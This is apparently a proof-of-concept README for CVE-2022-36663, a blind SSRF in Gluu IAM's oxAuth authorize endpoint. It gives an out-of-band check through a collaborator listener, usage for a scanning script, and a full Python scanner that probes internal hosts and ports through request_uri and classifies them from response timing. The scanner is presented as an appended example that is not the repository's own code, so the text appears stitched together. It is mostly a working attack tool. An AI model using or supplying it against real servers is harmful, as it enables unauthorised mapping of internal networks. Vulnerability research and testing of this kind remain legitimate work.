aqeisi/CVE-2022-36663-PoC
CVE-2022-36663-PoC

Internal network scanner through Gluu IAM blind SSRF

Gluu IAM (oxAuth) is vulnerable to a blind SSRF: the /oxauth/restv1/authorize endpoint fetches whatever URL is supplied in the request_uri parameter. The fetched content is never returned to the caller, but the time the server takes to answer differs depending on whether the internal host:port it was pointed at accepts, refuses or drops the connection, so the delay alone is enough to scan the internal network for open ports.

https://nvd.nist.gov/vuln/detail/CVE-2022-36663

To check whether a target is vulnerable, append &request_uri=http://burpcollab (replace burpcollab with a Burp Collaborator or other out-of-band listener hostname you control) to an otherwise valid /oxauth/restv1/authorize request and poll the listener for incoming traffic from the target server. A DNS lookup or HTTP connection arriving from the server confirms that it follows request_uri.

Usage

python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='

--url - the Gluu IAM server URL (scheme and host, e.g. https://target)

--ip - the internal IP address or CIDR subnet to scan

--port - the internal TCP port to scan on each host

--ar - the authorization request (path and query string) ending with an empty request_uri= parameter; the script appends the internal http://ip:port/ URL to it for each probe
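The procedure described above (out-of-band vulnerability check, then timing-based port scan through request_uri), written out as an added example. This is not the repository's CVE-2022-36663.py and does not reproduce its logic; it assumes, beyond what the page states, that oxAuth fetches request_uri synchronously while handling the authorize request, that a refused port returns quickly while an open or filtered port delays the response, and that port 1 on each host is closed and can serve as a per-host timing baseline. The thresholds, the baseline port and the EXAMPLE_AR placeholders are illustrative and must be tuned against a known host before trusting any verdict.

```python
"""Timing-based internal port scan through the oxAuth request_uri blind SSRF.

Added example, not the repository's CVE-2022-36663.py. Assumed behaviour (not
stated on the page): oxAuth fetches request_uri while handling the authorize
request, so a closed internal port (immediate RST) answers about as fast as a
normal request, an open port keeps the server busy noticeably longer, and a
filtered port leaves the server waiting until a connect timeout. Thresholds
and the baseline port are illustrative guesses; calibrate on a known host.
"""
import argparse
import ipaddress
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

# Authorization request from the README usage, placeholders left as-is.
EXAMPLE_AR = ("/oxauth/restv1/authorize?client_id=<clientID>"
              "&redirect_uri=https://target.com/return.html&response_type=code"
              "&scope=openid+profile+email+user_name&nonce=<nonce>"
              "&acr_values=simple_password_auth&request_uri=")


def build_probe_url(base_url: str, auth_request: str, fetch_url: str) -> str:
    """Append the URL the server should fetch to an authorize request that
    ends with an empty request_uri= (the --ar argument), percent-encoded."""
    if not auth_request.endswith("request_uri="):
        raise ValueError("auth_request must end with an empty 'request_uri='")
    return base_url.rstrip("/") + auth_request + urllib.parse.quote(fetch_url, safe="")


def timed_get(url: str, timeout: float = 15.0) -> float:
    """Send the request and return its round-trip time in seconds. The status
    code is irrelevant for a blind SSRF; only the delay carries information."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:  # 4xx/5xx, TLS errors or our own timeout still yield a timing
        pass
    return time.monotonic() - start


def classify(elapsed: float, baseline: float, slow_factor: float = 3.0,
             min_delta: float = 0.5, timeout: float = 15.0) -> str:
    """Heuristic verdict for one probe (assumption, see module docstring)."""
    if elapsed >= timeout:
        return "filtered?"  # our client gave up: server still waiting on connect
    if elapsed > max(baseline * slow_factor, baseline + min_delta):
        return "open"       # markedly slower than the known-closed baseline
    return "closed"


def expand_targets(targets: str) -> List[str]:
    """Accept a single IP or a CIDR; /31 and /32 have no network/broadcast to drop."""
    net = ipaddress.ip_network(targets, strict=False)
    return [str(a) for a in (net if net.num_addresses <= 2 else net.hosts())]


def scan(base_url: str, auth_request: str, targets: str, port: int,
         probe: Callable[[str], float] = timed_get,
         baseline_port: int = 1, timeout: float = 15.0) -> Dict[str, str]:
    """Per host: time a probe of baseline_port (assumed closed) for reference,
    then the port of interest, and classify the difference. `timeout` must
    match the probe's own client timeout for the 'filtered?' verdict to mean
    anything; `probe` is injectable so the logic can be tested offline."""
    verdicts: Dict[str, str] = {}
    for host in expand_targets(targets):
        baseline = probe(build_probe_url(base_url, auth_request, f"http://{host}:{baseline_port}/"))
        elapsed = probe(build_probe_url(base_url, auth_request, f"http://{host}:{port}/"))
        verdicts[host] = classify(elapsed, baseline, timeout=timeout)
    return verdicts


if __name__ == "__main__":
    p = argparse.ArgumentParser(description="CVE-2022-36663 timing port scan (example)")
    p.add_argument("--url", required=True, help="Gluu IAM base URL, e.g. https://target")
    p.add_argument("--ip", required=True, help="internal IP or CIDR to scan")
    p.add_argument("--port", type=int, required=True, help="internal TCP port to scan")
    p.add_argument("--ar", default=EXAMPLE_AR, help="authorize request ending in request_uri=")
    p.add_argument("--oob", help="optional collaborator host for the vulnerability check")
    args = p.parse_args()
    if args.oob:
        # Vulnerability check from the README: make the server call out, then watch the listener.
        timed_get(build_probe_url(args.url, args.ar, f"http://{args.oob}/"))
        print(f"sent request_uri=http://{args.oob}/ ; poll the listener for traffic from the target")
    for host, verdict in scan(args.url, args.ar, args.ip, args.port).items():
        print(f"{host}:{args.port}\t{verdict}")
```

Run it with the same --url/--ip/--port/--ar arguments as the repository script; adding --oob performs the collaborator check first. Because a single host's verdict rests on one timing comparison, repeat suspicious probes and widen min_delta on a noisy network; a consistently fast answer from a port you know is open means the assumed timing model does not hold for that server and the thresholds need recalibrating.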

